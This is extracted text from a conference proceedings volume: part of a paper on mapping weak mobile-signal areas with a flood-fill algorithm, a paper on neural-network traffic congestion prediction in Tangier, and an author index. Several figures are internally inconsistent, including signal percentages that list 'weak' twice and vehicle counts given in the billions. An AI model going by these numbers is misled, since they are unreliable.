2 Related Work 2.1 Evaluation of the Signal Strength of the Mobile Network for GSM Networks in Gusau, in the State of Zamfara Network subscribers complained about the poor quality of the services (QoS) provided by GSM operators in the study area [3]. This document measures the signal strength of the GSM networks of service providers (X, Y and Z) at the Federal University of Gusau, the central part of Zamfara State, in order to respond to user complaints. The data used for this evaluation were collected from the University’s National Space Research and Development Agency (NASRDA) office. The data collected are for a period of thirty (30) days. The signal strength of these network providers is generated every five (5) minutes of each day, for 288 data per day and 8640 data for the thirty days. This institute uses the field counter (FS) to generate this data as well as data on other physical conditions. 2.2 Comparison Between the Differ Operator Figure 1 shows that Operator X has 13% high signals, 77% medium signals, 3% weak signals, and 7% weak signal (Fig. 3).

Fig. 3. Graphical illustration of the signal strength of operator X in percentages.

408

I. El Moudden et al.

Fig. 4. Graphical illustration of the signal strength of the Y operator in percentages.

Figure 4 shows that operator Y has 90% medium signals, 3% weak signals and 7% weak signals. Figure 5 shows that operator Z has 77% high signals, 13% medium signals and 10% weak signals. The result indicates that operator Z has better signal strength, followed by operator Y and then operator X.

Fig. 5. Graphical illustration of the signal strength of the Y operator in percentages.

3 Collection of Data via the Application 3.1 Figures and Tables Development of a Mobile Application Since received signal strength indication (RSSI) information is available in all mobile phones, we have developed a custom mobile application for the collection of signal strength data (RSSI) with the user’s geographical coordinates. We have installed this app in different mobile phones moved by a car (Fig. 6).

New Analytical Method to Classify Areas According to Signal Quality

409

Fig. 6. User Interface

3.2 The Areas Concerned The data was collected in two different geographical areas. The first in a densely populated area, and second to a sparsely populated area so we drove through the streets of that area to collect as much data as possible (Fig. 7).

410

I. El Moudden et al.

A. Densely Populated Area

Fig. 7. Area with higher population density

The following table represents a sample of real-time signal strength and location data in a densely populated area:

New Analytical Method to Classify Areas According to Signal Quality

Fig. 8. Signal strength of the most densely populated area

411

412

I. El Moudden et al.

B. Sparsely Populated Area

Fig. 9. Sparsely Populated Area

The following table represents a sample of real-time signal strength and location data in a sparsely populated area (Fig. 10):

New Analytical Method to Classify Areas According to Signal Quality

413

Fig. 10. Signal strength of the sparsely populated area

4 The Algorithm Proposes 4.1 The Flood Filling Algorithm In this article, we propose a flood fill algorithm, The algorithm starts working from a certain point (x, y) and reallocates all the pixel values currently fixed to a given inner color with the required fill color. In a condition of multiple interior colors, pixel values are reassigned so that all interior points contain the same color. L’algorithme de remplissage traditionnel prend trois paramètres : un pixel de départ, une couleur cible et une couleur de remplacement. L’algorithme recherche tous les pixels

414

I. El Moudden et al.

du tableau qui sont connectés au pixel de départ par un chemin de la couleur cible et les remplace par la couleur de remplacement. Il existe deux méthodes qui peuvent être utilisées pour créer une frontière continue en connectant des pixels - approche à 4 et 8 connectés. Dans le 4 connectés méthode, [4] le pixel peut avoir au maximum quatre voisins les voisins de la position (x, y) sont Droite (x+1, y), Gauche (x-1, y), Haut (x, y+1), Bas (x, y-1) montre dans la Fig. 8.

Fig. 11. 4 connectés méthode

On the contrary, in the 8 connected method, there can be eight and the positions close to the position (x, y) are Right (x+1, y), Left (x-1, y), High (x, y+1), Low ( x, y-1), Right-High (x+1,y+1), Left-High (x-1, y+1), Left-Low (x-1, y-1) and Right-Down ( x+1,y-1) shows Fig. 9.

Fig. 12. 8 connectés méthode

New Analytical Method to Classify Areas According to Signal Quality

415

4.2 Program Code Program listings or program commands in the text are normally set in typewriter font: Step 1: Initialize the old_color and fill_color. Step 2: find the current_value of position (x y). Step 3: if current_value is equal old_color then setpixel(x, y) with fill_color Flood_fill_4_connectd (x, y+1, old_color, fill_color) Flood _fill_4_connected(x+1, y, old_color, fill_color) Flood _fill_4_connected(x, y-1, old_color, fill_color) Flood _fill_4_connected(x-1, y, old_color, fill_color) end of if Step 4: end

5 Proposed Solution 5.1 Presented Nodes via Signal Strength Level on Relevant Areas We have identified the nodes that have been interrupted by the signal (weak signal) to create problem areas on the network and adjacent areas are identified based on flood algorithms. The identification of geographical areas begins in the first place with the collection of real-time signal strength data and the classification of nodes. The following table defined Depending on the level of the strength of the signal, the colors of the regulatory nodes to be prescribed:

416

I. El Moudden et al.

Node Category

Wrong signals

Weak signals

Medium signals

High signals

Signal strength

-101 to 120dB m

-91 to 100dB m

-76 to 90dBm

-50 to 75dBm

Node color

Red

Red

Blue

Green

Fig. 13. Signal strength classes

5.2 Presents Problem Areas via the Flood Algorithm The application of the flood algorithm is available if the pixel database is a matrix such that each pixel it has neighbors, that is to say a complete coverage. In our study, the form of the data cannot give the possibility of reaching a total coverage because the data collection is available with linear paths. The first solution we will keep the linear paths we have, that is, we determine the signal level of the roads. We can apply the flood algorithm based on our path instead of using the four- or eight-lane flood algorithm, which means we use the available lanes based on our route and intersection points. Second solution we can generate the valid environment to apply the four or eight way flood algorithm for this reason we can make the signal level forecast around the node to cover the entire interface, Point-to-area forecasts based on this method consist of series of numerous point-to-point forecasts. The pixel number should be large enough to ensure that the received signal force values obtained are reasonable estimates of the median values, relative to the elementary locations they represent. The signal coverage can be determined according to the different straight lines containing the actual values of the strength of the received signal in real time. For each line (ax1 + b, ax2 + b, ax3 + b .......... up to the right axis axn + b) we will draw triangular regions with nodes signaling geographical coordinates (x1, y1), (x2, y2), (x1, y1)………. (xn, yn) along the respective lines. The coverage of each triangle takes into account the value of the neighboring node signal level as an indicator of propagation. 5.3 Model Architecture Figures 11, 12 and 13.

New Analytical Method to Classify Areas According to Signal Quality

417

6 Analysis of the Following Signal the Environment of Each Zone On the way of cell signal propagation, there are natural or artificial barriers. They are rugged terrain, thick wood, buildings and vehicles that prevent the passage of electromagnetic waves. By reflecting on obstacles, the signal loses energy and weakens. For this reason, the connection is interrupted or lost for the reasons we have specified the areas concerns manually and resembled the maximum information for the types of obstacle.

7 Conclusion It is clear that addressing network coverage problems is a complex matter and requires the study of signal strength data, but it is not possible to collect data that covers the entire studied area, and even most of the previous research only determines the signal strength and does not specify the problem area. In this context, we discussed the division of the network into regions according to the level of signal strength depending on the flood fill algorithm.

References «FactsFigures2020.pdf». Consulté le: 7 mars 2022. https://www.unapcict.org/sites/default/files/ 2021-03/FactsFigures2020.pdf «Le Drive Test | PDF | Téléphonie mobile | Qualité de service». Scribd https://fr.scribd.com/doc ument/215126010/Le-Drive-Test (consulté le 15 mars 2022) Sa’adu: «Assessment of Mobile Network Signal Strength For Gsm Networks In Gusau, Zamfara State» (2019). https://www.semanticscholar.org/paper/Assessment-of-Mobile-NetworkSignal-Strength-For-In-Sa%E2%80%99adu/a9c6efbb62396bd08b5e7fafcb966dd06f50236e (consulté le 16 mars 2022) Bhawnesh, J., Kalra, E.T., Tomer, V.: «Comparison and Performance Evaluation of», International Journal of Innovative Technology and Exploring Engineering, vol. 8, août (2020). 35940/ijitee.L1002.10812S319

Neural Network Feature-Based System for Real-Time Road Condition Prediction Youssef Benmessaoud1(B) , Loubna Cherrat2 , Mohamed Rida Ech-charrat1 , and Mostafa Ezziyyani1 1 Faculty of Sciences and Technologies of Tangier, Tangier, Morocco

{ybenmessaoud,m.ezziyyani}@uae.ac.ma

2 Abdelmalek Essaadi University, ENCG, Tangier, Morocco

[email protected]

Abstract. The road congestion subject has been a very popular one nowadays and also a very challenging one, many solutions have been proposed to solve this phenomena, short-term forecasting, or the estimation of daily to the next few days’ condition of traffic flow is a crucial component of cutting-edge driver assistance systems and can be seen as a real solution for the congestion problem. In this paper we proposed a real-time prediction system based on different road features that were determined after studying various road networks on different periods of the year and different times of the day, The main goal of the current study is to construct a data-driven, feature-based model to realize accurate and near real-time prediction of user’s destination road condition. Keywords: Intelligent decision · Information Technology · congestion prediction · neural networks · traffic flow prediction · Advanced traffic management systems

1 Introduction Urban traffic congestion has become a serious issue in the development of smart cities due to the rapid advancement of urbanization [1]. It may occur when the demand for transportation exceeds the capacity of the road network, leading to an increase in traffic accidents, serious air pollution, and fuel consumption [2]. According to the European Commission’s estimate, the annual cost of backed-up roads in Europe surpasses 120 billion euros [3]. According to the Moroccan ministry of equipment, transport and logistics, the number of vehicles has increased from 2.791.004.000 in 2010 to 4.056.598.000 in 2017 [4]. In addition to affecting public comfort and safety, traffic management practices can result in poor air quality in metropolitan areas, which may have a negative impact on people’s health. Road traffic severely worsens air quality in cities and towns, causing serious pollution problems including smog and carbon monoxide. Due to the rising use of private vehicles, road traffic pollution is acknowledged in practically every country as a severe threat to clean air. The harmful compounds in transportation fumes, which © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 J. Kacprzyk et al. (Eds.): AI2SD 2022, LNNS 712, pp. 418–431, 2023. https://doi.org/10.1007/978-3-031-35251-5_40

Neural Network Feature-Based System for Real-Time

419

are released into the atmosphere, produce pollution. Road traffic emissions produce greenhouse gases, which cause global warming [5]. Finding a solution to traffic congestion has become a necessity, many solutions have been proposed, travel time prediction has gained more attention in recent years due to its significance as a network performance indicator and its simplicity as a simple tool for informing drivers about traffic conditions. There have been several proposed univariate and multivariate approaches to model average journey time, with the majority utilizing neural network, predicting traffic volume and density is what we define as traffic prediction, and it is typically done to control vehicle movement, ease congestion, and choose the best route. Short-term traffic predictions using neural networks are a topic that is gaining interest, especially since improvements in transportation systems have greatly enhanced the accessibility of enormous amounts of traffic data from multiple sources [6].

2 Related Works Artificial intelligence and neural network are promising technologies that provide intelligent, adaptive performance in a variety of application domains, including traffic management and road conditions predictions, different studies have been published in this field, one study [7] proposes an algorithm that uses historical observations of vehicle flow and speed to provide short-term forecasts of these parameters on a stretch of road. This approach is built on a recurrent neural network that is physics-aware. The network’s architecture incorporates a discretization of a macroscopic traffic flow model that produces estimates and predictions for the flow and speed of moving vehicles that are based on estimated and predicted space-time dependent traffic parameters and are physically constrained by the macroscopic traffic flow model. Another study [8] is interesting too as researchers created a virtual graph out of the road segments with the highest significance, this research suggests a deep ensemble neural network (DENN) model to increase the accuracy of urban traffic status predictions.

3 Proposed Solution Many factors, including infrastructure, car density, and the inadequate quality and capacity of public transportation, contribute to the high degree of traffic congestion in the majority of Moroccan cities. According to the ministry of machinery, transport, and logistics, traffic congestion limits social and sustainable development as well as Moroccan economic growth. According to our previous work [9], we have developed Ezzi-traffic app in which we collected data from more than 15 taxi drivers all over the city of tangier, Data was collected during all times of the year, as the congestion level can be different from one year period to the other, many factors can affect traffic distribution and level including: 1- Holidays Vacations take visitors down routes they’ve never traveled before. They become confused, their attention is drawn to the GPS rather than the road, and they make mistakes.

420

Y. Benmessaoud et al.

Furthermore, visitors just add to the general traffic congestion as most of them use their private cars to move around the visited city which leads to higher congestion level and roads saturation. Here are the details of holidays in Morocco (studied country): Eid Al Mawlid: 12 and 13 Rabie Al Awwal 1443 (2 days). Green March: Saturday, November 6, 2021 (1 day). First holidays and Independence Day: from Sunday November 14, 2021 to Sunday November 21, 2021 (8 days). Second holidays and New Year: from Sunday, December 26, 2021 to Sunday, January 2, 2022 (8 days). Independence Manifesto: Monday, January 11, 2022 (1 day). End of semester holidays: from Sunday, February 6, 2022 to Sunday, February 13, 2022 (8 days). Third holidays: from Sunday April 03, 2022 to Sunday April 10, 2022 (8 days). Labor Day: Sunday, May 1, 2022 (1 day). Aid El Fitr: from 29 Ramadan to 2 Chaoual 1443 (4 days). Aid Al Adha: from 8 to 11 Do Al Hija 1443 (Days). The dates of Eid al-Fitr and Eid al-Adha are determined by the lunar calendar and change every year. In 2009–2017, Eid al-Fitr was mostly during the summer and Eid al-Adha was between September and November. Given the significance of these two holidays, it is possible that taxi and drivers will either not work or reduce the length of their shifts. This should reduce the number of vehicles in the city, which would reduce congestion on those dates [10]. 2-Special days 2–1- Christmas During Christmas, most countries around the world know a higher level of traffic congestion from 23 December to 03 January, this increase in traffic flow is caused by leisure trips mostly, according to AAA [11], In USA only, over 100 million Americans are planning to get to their holiday destination via cars. In 2020, 78.5 million hit the road for Christmas and New Year’s, this period knows a high level of mobility so it’s important to be taken into consideration while calculating the impact factor. 2–2- Ramadan During the holy month of Ramadan, the Iftar time is observed throughout the Arab and Muslim world at sundown each day. Iftar is the evening meal when Muslims break their fast, and it is historically celebrated by families and communities. Unfortunately, Ramadan is also a time of year when there is a spike in traffic congestion, accidents, deaths, and injuries, with the majority of these accidents occurring either before or during the Iftar meal.

Neural Network Feature-Based System for Real-Time

421

The following behaviors have been reported by traffic policing departments across the MENA region: As the sun sets, there is an increase in traffic congestion and rule violations; roads around malls, mosques, and markets become congested; more drivers speed, disobey traffic signals, and talk on their phones while driving. The following analysis could be attributed to the reasons for the Ramadan road safety concern: Fasting during Ramadan causes a significant disruption in one’s daily routine. It has the potential to affect one’s diet and digestion, as well as sleeping patterns [12]. 3-Summer During summer time, not only the number of tourists increases but also people’s behavior and routine is different, summer evenings and nights are the peak time in term of traffic congestion as most of the road users are private car users who enjoy driving around the city and exploring it using mostly the same roads which leads to higher traffic congestion. Summer time is also different as the government shifts into daylight saving time (DST), car accidents and traffic jams decreases when the clock changes to DST and increases when the clock changes back to standard time. This could be explained by the increased amount of light available during the evening rush hour when the clock changes to DST [13]. In this research, using collected nodes that are well distributed all around Tangier and data from taxi drivers, some tests have been made to select a radius around every node, 50 m was selected as the adequate radius to get the most efficient results. To have better results and understanding of when congestion occurs on a certain node, we split the data collected on a 30 min time frame, for example on node 0 (Trial atlas) Table 1 shows data entries for taxi 1 every 10 s from 08:00 to 8:30 (30 min), taxi1 entered the node 0’s radius of 50m on 08:13:20 and went out on 08:16:40 which means that he spent a total of 4 min inside. The congestion index in this particular case is 4. Each graph node and road have a numerical value called a weight that is connected with it. The weight in our case is non-negative integers, in this research, the weight of a node or a road is referred to as the “cost” of the node or the road. The cost can be used to represent the length of a route, the capacity of a line, the energy required to transit between nodes along a route, and so on in applications. Applying the previous method on the general map of Tangier, using the average time concluded from the calculation of the average time each driver spent inside a specific node’s radius is crucial to determine nodes that know a high level of congestion. For example, we consider node 0 as i1, and node 1 as j1, to determine the cost (i1, j1) we have to calculate cost(i1) and cost(j1): • cost i1 is the average of time that the studied taxi drivers spend in the determined radius of node 0 in a certain time frame, which is according to Table1 is 4 min on the time frame between 08:00 and 08:30. • cost j1 is the average of time that the studied taxi drivers spend in the determined radius of node 1, which is for example 1 min in the same time frame from 08:00 to 08:30.

422

Y. Benmessaoud et al.

Fig. 1. Sheet example of data collected

cost i1 = 4 and cost j1 = 1 The cost(i1 , j1 ) can be calculated as shows Fig. 7.: Cost(i1 , j1 ) = Cost(i1 ) + cost(j1 ) + costdis(i1 , j1 ) For Example, from i1 to j1 : Between i1 and j1, it took the user from 08:13:20 to 08:16:26 to cross this road, which is approximately 0.051 h. If time is null its value is eliminated, if it’s more than 5 min it’s eliminated as in this case the vehicle is considered to be parked. The cost of the road between two nodes is defined as the average time spent by users inside that road:    Time[i1 , j1 ] costdist i1 , j1 = Number of drivers

Neural Network Feature-Based System for Real-Time

423

Table 1. Estimated time on [i1, j1]

X i1

j1

Y

time

35.762827

-5.838593

08:13:20

35.763311

-5.838022

08:13:30

35.763699

-5.837544

08:13:40

35.764120

-5.837035

08:13:50

35.764762

-5.836169

08:14:20

35.765238

-5.83487

08:16:20

35.765926

-5.834450

08:16:26

Table 2. Estimated time on Roads for different taxi drivers Time spent Road

Distance

Taxi 1

Taxi 2



Taxi N

[i1, j1]

0.53 km

0.051 h

0.055 h

….

0.030 h

[i1, j2]

0.88 km

0

0.065 h

….

0.083 h

[i1, j3]

1.2 km

0.045 h

0.032 h

….

0.055 h









….



[i, j]

0.66 km

0.040 h

0.029 h

….

0.052 h

The average speed inside the urban areas is considered to be 40km/hour, the perfect time of from A to B is calculated using perfect values considering the distance is 0.53 km and speed is 40 km/hr.   Considering road [i1 , j1 ], costdist i1 , j1 is: 0.051 + 0.055 + 0.030 / 3 = 0.136 / 3 = 0.045 h = 2.7 min. costdist[i1 , j1 ] = 2.7 min As calculated previously, cost (i1 ) = 4 and cost (j1 ) = 1. The total cost of going from node 0 to node 1 is: cost(i1 , j 1) = cost(i1 ) + cost(j1 ) + costdist[i1 , j1 ] = 4 + 1 + 2.7 = 7.7

424

Y. Benmessaoud et al. Table 3. Weight for SC1 nodes Order of node

Id of node

Weight

1

143

19

2

202

18

3

35

18

4

4

16

5

198

12





….

140

56

9

141

101

3





….

208

9

2

Table 4. Weight for SG2 nodes Order of node

Id of node

Weight

1

52

21

2

157

20

3

123

17

4

201

13

5

47

12





….

140

93

12

141

107

10

….



….

208

130

3

Figure 2 Demonstrates how the cost calculations are done, after these calculations of the exact cost of every node we were able to calculate the cost between two nodes and based on it and using the A* algorithm we were able determine the shortest road based on: • • • •

Vehicle speed Time Source Destination.

Neural Network Feature-Based System for Real-Time

425

The function path (), is the function responsible of defining the best road to go through, this function receives the Vehicle speed, time, source node and destination node and based on that, it suggests the best road to take to avoid congestion. A basic version of a mobile application was developed by our team to represent the algorithm’s results, and suggest the shortest road the users of this application can take based on the selected source and destination nodes on a certain time slot. This application uses our algorithm’s API on online mode and text files downloaded on offline mode. As the data is divided to different time frames during the day on a 30 min frame starting from 08:00 of morning, the text files are also divided in the same way, the cost of every node and road is saved into the text file, when the call is made from the app, the time is automatically detected and the data is retrieved from the appropriate file that corresponds to that specific time frame. If a user starts his journey in a time frame and the journey ends in another time frame, data is retrieved according to time and results are updated continually depending of the new data.

0.53 km

j1

i1 Cost (

)

[ , ]

Fig. 2. Cost calculation method

Fig. 3. Basic representation of graph

Cost (

)

426

Y. Benmessaoud et al.

The establishment of a ‘balanced distribution’ of nodes is very important in this study, covering all the city territory and collecting all important intersections and traffic points is crucial to achieve better results. Figure 4 and Fig. 5 are a graphic representation of Tangier’s map and Casablanca’s map, which also represents the positioning of some of the selected nodes around both cities.

Fig. 4. Tangier’s map with nodes’ positions

The elements taken into consideration in both cities are: • Number of schools. • Number of supermarkets. • Number of restaurants. Determining the number of all schools, supermarkets and restaurants in each city couldn’t be done manually as the system should be automatic, using a python based google maps data scrapper developed by our team, we’ve been able to scrape all the data in both Tangier and Casablanca, the two cities concerned with our study at this stage of our research, knowing that the scrapper is able to generate the same information for any other city around the world. Factors that impact road condition on a segment [A, B] are: • Node’s type: The type of node available in all cities is one of three options: Light intersection, Traffic point, Normal intersection (no light). • number of exits: In data collection phase, along with the nodes’ positions, each node’s number of exits was extracted too. Node A in Fig. 8. For example, has 4 exits.

Neural Network Feature-Based System for Real-Time

427

Fig. 5. Casablanca’s map with nodes’ positions

• length of exits: In data collection phase, along with the number of exits, each node’s number of entries was extracted too. Node A in Fig. 8. For example, has 4 entries. • road’s capacity: Every node has different exits and entries, the road’s density means the density of the roads that leads in and out of that specific node’s radius, the impact of density is simple, as much as the road density is higher, less congestion occurs, we’re calculating the road’s density in the worse scenarios considering  to be the distance between two vehicles, and W the road’s width as it can determine how many lanes each road has, in urban areas the normal lane is around 3 m. We also consider £ to be the road’s length.

• Capacity =

£ 4.6 + 

Using the node’s type, number of exits, length of exits and road’s capacity, the algorithm calculates the weight of each node:  Weight = NodeType ∗ α + (Nbrexits + nbrentries ) ∗ β + capacity ∗ µ with: • α: Importance of node type. • β: Number of exits Importance • μ: Capacity importance

428

Y. Benmessaoud et al.

In this research, the weight of each node is calculated using the formula above, once the weight is the calculated all nodes are added to a list in a descending order starting with the node that has the biggest weight, for both SC1 and SG2. The algorithm uses the order of nodes to match each node from SC1 to the corresponding node from SG2. In case there is similar weights the node is associated randomly to one of the similar nodes from SG2. Neural Networks to Predict Traffic Condition Neural networks are computing systems with interconnected nodes that work much like neurons in the human brain. They can cluster and categorize raw data using algorithms, identify hidden patterns and correlations in it, and – with time – continually learn and get better. Neural networks are also perfectly suited to assisting individuals in resolving challenging issues in practical settings.

Fig. 6. Representation of road scheme

They can discover hidden correlations, patterns, and forecasts; learn and model nonlinear, complicated interactions between inputs and outputs; and model highly volatile data (like financial time series data) and variances required to forecast sporadic events (such as fraud detection).

Neural Network Feature-Based System for Real-Time

429

Neural networks can thereby enhance decision-making in areas like: • • • • • • • • • • • •

Medicare fraud detection and credit card fraud. Transportation network logistics optimization. Natural language processing, also referred to as character and speech recognition. disease and medical diagnostic. focused advertising. Stock prices, currency, options, futures, bankruptcy, and bond ratings all have financial forecasts. controls for robots. forecasting of electrical load and energy demand. Quality and process control. Identification of a chemical substance. Ecosystem assessment. Using computer vision to analyze unprocessed images and videos (for example, in medical imaging and robotics and facial recognition).

In our study we propose a neural network system that is based on road features in which we identify as: • Type of the day (holidays…) • Time (morning, afternoon….) • Element with impact factor (schools, hospitals, restaurants…) Based on previous work, each segment of road [A, B] is defined with specific features and elements that can be part of the congestion problem that might happen in that certain segment of the road.

430

Y. Benmessaoud et al.

We have collected data from various drivers that used our application ezzi-traffic, in which we have identified different road segments as Fluid (F), MediumFluid (MF) or NonFluid (NF), this identification helped us create our neural network system.

F1 F2

F

.

MF

.

NF

Fn

NR 4 Conclusion In metropolitan areas, especially during times of peak demand, congestion is unavoidable and, within some bounds, may even be desired because the costs associated with it are lower than those needed to completely eliminate it. The following costs would be incurred in an effort to completely eliminate traffic congestion, among them those related to investments in expanding road capacity, which may outweigh the costs of moderate levels of congestion and those brought on by diverting traffic to alternative routes, modes of transportation, or travel times. The main objective of our study is to ensure both the safety of people who live in congested locations and that our technology would assist decrease strain on key nodes during specific time windows. To do this, we first developed a functioning model for one city and then applied it to additional cities, taking advantage of the similarities in the roads and infrastructures of the majority of significant Moroccan cities. The growth of computer science and the accessibility of big data have encouraged academics to apply a variety of models in this area; nevertheless, the majority of these solutions either failed to accurately predict traffic congestion or did not give drivers a simple platform to use to avoid it. The neural network approach can be very interesting in solving the congestion problem as it can help predict congestion in areas where no data was collected, only from features of that area during different seasons of the year and different time of the day we can predict the road condition.

Neural Network Feature-Based System for Real-Time

431

References 1. Lu, J., Li, B., Li, H., Al-Barakani, A.: Expansion of city scale, traffic modes, traffic congestion, and air pollution Cities, 108, Article 102974 (2021) 2. Zheng, F., Van Zuylen, H.: Urban link travel time estimation based on sparse probe vehicle data 3. Roncoli, C., Papageorgiou, M., Papamichail, I.: Traffic flow optimisation in presence of vehicle automation and communication systems – Part I: A first-order multi-lane model for motorway traffic 4. http://www.equipement.gov.ma/en/Pages/home.aspx 5. https://www.environmentlaw.org.uk/rte.asp?id=38 6. Zhua, Z., Zhang, A., Zhang, Y.: Connectivity of intercity passenger transportation in China: a multi-modal and network approach 7. Pereira, M., Lang, A., Kulcsár, B.: Short-term traffic prediction using physics-aware neural networks 8. Lu, W., Yi, Z., Wu, R., Rui, Y., Ran, B.: Traffic speed forecasting for urban roads: a deep ensemble neural network model 9. Benmessaoud, Y., Cherrat, L., Bennouna, M., Ezziyani, B.: Intelligent live traffic models decision support for driving directions and road conditions updates 10. Shefer, D.: Congestion, air pollution, and road fatalities in urban areas. Accid. Anal. Prev. 26(4), 501–509 (1994) 11. Traffic congestion to shit during ramadan, rio sandiputra and trias risangayu 12. Bink, A.: Nexstar media wire, these are the worst times to travel on the roads for christmas new Year’s 13. Murat Kalafat, U., Topacoglu, H., Dikme, O., Dikme, O., Sadillioglu, S., Orfi Erdede, M.: Evaluation of the impact of the month of ramadan on traffic accidents

Author Index

A Abdellah, Najid 339 Abdellatif, Ben Abdellah 15 Abdoun, Otman 348 Adnane, Latif 320 Ahmadi, Adnan El 348 Ahmed, Drissi 132 Ait Bouslam, Karima 118 Amadid, Jamal 118 Anas, Hatim 320 Ariss, Anass 40 Aroussi, Hatim Kharraz 9, 199 Arqane, Aouatif 1 Arroub, Omar 179 Assad, Noureddine 168 Ayoub, Zougari 15 Azizi, Mostafa 205 B Barhami, Yasmine El 199 Belhiah, Meryam 328 Belkasmi, Mohammed Ghaouth 302 Ben Chakra, Fatima Zohra 230 Bencharef, Omar 55 Benfssahi, Mouna 73 Benmessaoud, Youssef 418 Bensaid, Chaimae 199 Boughardini, Imane El 93 Boujrad, Mouna 390 Boukabous, Mohammed 205 Boukhriss, Hicham 1 Boukili, A. E. 377 Boumait, El Mahdi 266 Boutkhoum, Omar 1 C Chentouf, Abdellah 404 Cherkaoui, Abdeljabbar 64 Cherrat, Loubna 404, 418

Chhaybi, Akram 145 Chihab, Younes 55 D Dadda, Afaf 282 Dahbi, Aziz 168 Darif, Anouar 179 Douae, Tizniti 310 E Ech-charrat, Mohamed Rida 418 Ech-charrat, Mohammed Rida 404 El Akkad, Nabil 230 El Gadrouri, Rachid 251 El Hamdouni, Mohamed 214 El Kafhali, Said 240 El Mane, Adil 55 El Moudden, Ibrahim 404 El Moutaouakkil, Abdelmajid 1 Ennejjai, Imane 40 Ezzine, Latifa 282 Ezziyyani, Mostafa 40, 404, 418 F Farouq, Saloua 220 Felsoufi, Zoubir El 73 G Grari, Mounir 205 H Habbani, Ahmed 266 Haddach, Abdelhay 73 Haimoudi, El Khatir 348 Hairech, Oumaima El 296 Hajar, Rhylane 15 Hanini, Mohamed 191, 240 Haqiq, Abdelkrim 191 Hassan, Badir 310

© The Editor(s) (if applicable) and The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 J. Kacprzyk et al. (Eds.): AI2SD 2022, LNNS 712, pp. 433–434, 2023. https://doi.org/10.1007/978-3-031-35251-5

434

Author Index

Hassaoui, Mohamed 240 Hassine, Mohammed 145 I Ibnatta, Youssef 152 Idrissi, Idriss 205 Iqdour, Radouane 118 J Jamali, Abdellah

368

K Kasmi, Mohammed Amine 390 Khaldoun, Mohammed 152 Khalil, Amal 302 Kharmoum, Nassim 40 Korchiyne, Redouan 55 L Laaychi, Abdelaziz 107, 272 Labiad, Bochra 107, 272 Lamsellak, Hajar 302 Lazaar, Saiida 145 Lebhar, Ikram 282 Lyhyaoui, Abdelouahid 107, 272, 296 M Mansour, N. 377 Mastrouri, Reda 266 Mechkouri, Meriem Hayani 93 Mekki, Youssef 168 Meriem, Afilal 320 Mesmoudi, Yasser 214 Mohamed, El Alami 132 Mohtadi, Hibat Eallah 191 Moujahdi, Chouaib 168 Moumkine, Noureddine 359 Moumoun, Lahcen 368 Mounia, Ajdour 15 Mounir, Arioua 320 Moussaoui, Mimoun 205 Moussaoui, Omar 205

N Naim, Soufiane 359 Nezha, El Idrissi 339 O Oubelkas, Farah 368 Ouerdi, Noura 390 R Rachid, Filali Moulay 29 Rachid, Hdidou 132 Rahmani, Moly Driss 179 Raissouni, Fatima Zahra 64 Reklaoui, Kamal 93 Rhalem, Wajih 40, 404 Rziki, M. H. 377 S Saadane, Rachid 179 Saber, Mohammed 302 Sadik, Mohammed 152 Sadiqui, Ali 29 Sadki, Nordine 73 Sedra, M. B. 377 Soulhi, Aziz 220 T Tahiri Alaoui, Moulay Lakbir Tahiri, Abderrahim 214 Tajini, Reda 220 Tanana, Mariam 107, 272 Touil, Hamza 230 Y Yandouzi, Mimoun 205 Yassine, Rayri 9 Z Zenzoum, Omar 9 Zeroual, Abdelouhab 118 Ziti, Soumia 40, 328

328